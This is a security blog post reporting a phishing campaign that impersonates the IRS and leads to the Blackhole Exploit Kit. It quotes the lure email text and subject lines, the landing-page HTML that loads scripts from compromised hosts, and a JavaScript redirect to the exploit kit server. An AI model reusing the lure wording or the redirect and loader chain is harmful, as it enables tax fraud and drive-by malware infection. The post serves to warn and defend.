Blackhole Exploit Kit (BHEK) present in IRS email notifications


The Blackhole Exploit Kit (BHEK) is now present in emails that appear to be coming from the Internal Revenue Service (IRS). The emails notifies the recipient regarding the fact that they have to validate their EIN in order to reaffirm their actual status.

MX Lab, http://www.mxlab.eu, started to intercept a new trojan distribution campaign by email with the subjects like:

IRS: Attention all business owners
IRS: For the attention of business owners
IRS: For the attention of entrepreneurs
IRS: Important Information
IRS: New taxation policies
IRS: Notice for business owners
IRS: Notification for business owners
We solve your IRS issues
We solve your IRS problems
…..

The email is send from the spoofed address “****” and has the following body:

Internal Revenue Service (IRS)

Hello,

Due to the corrections in the taxation policies that have been recently applied, IRS informs that LLC, C-Corporations and S-Corporations have to validate their EIN in order to reaffirm their actual status. You have 14-day period in order to examine all the changes and make necessary amendments. We are sorry to cause inconvenience.

For the details please refer to:
https://www.irs.gov/ClientArea.aspx?u=5EB79283FD

  • Email address: 77388b23@*********.com

Sincerely yours,
Esteban Meyers
IRS Customer Service representative


This email was sent to 77388b23@*********.com by: Internal Revenue Service (IRS) � Internal Revenue Service � 1111 Constitution Ave. N.W. � Washington DC 20535

The URL points to hxxp://docencia.cl/bv8qKa/index.html where two Javascripts are requested:

<html>
<h1>WAIT·PLEASE</h1>
·<h3>Loading...</h3>
·<script·type="text/javascript"·src="hxxp://meowchicago.net/HoYgaiVa/js.js"></script>
<script·type="text/javascript"·src="hxxp://www.physio-voss.at/DxAv5M4Y/js.js"></script>
</html>

This Javascript contains the following code and points to the host where the Blackhole Exploit Kit (BHEK) is active.

document.location='hxxp://1.howtobecomeabostonian.com/links/marked-alter.php';

Again, as stated in other blog posts, do not following any of these URLs and delete the message from your system.

Uncategorized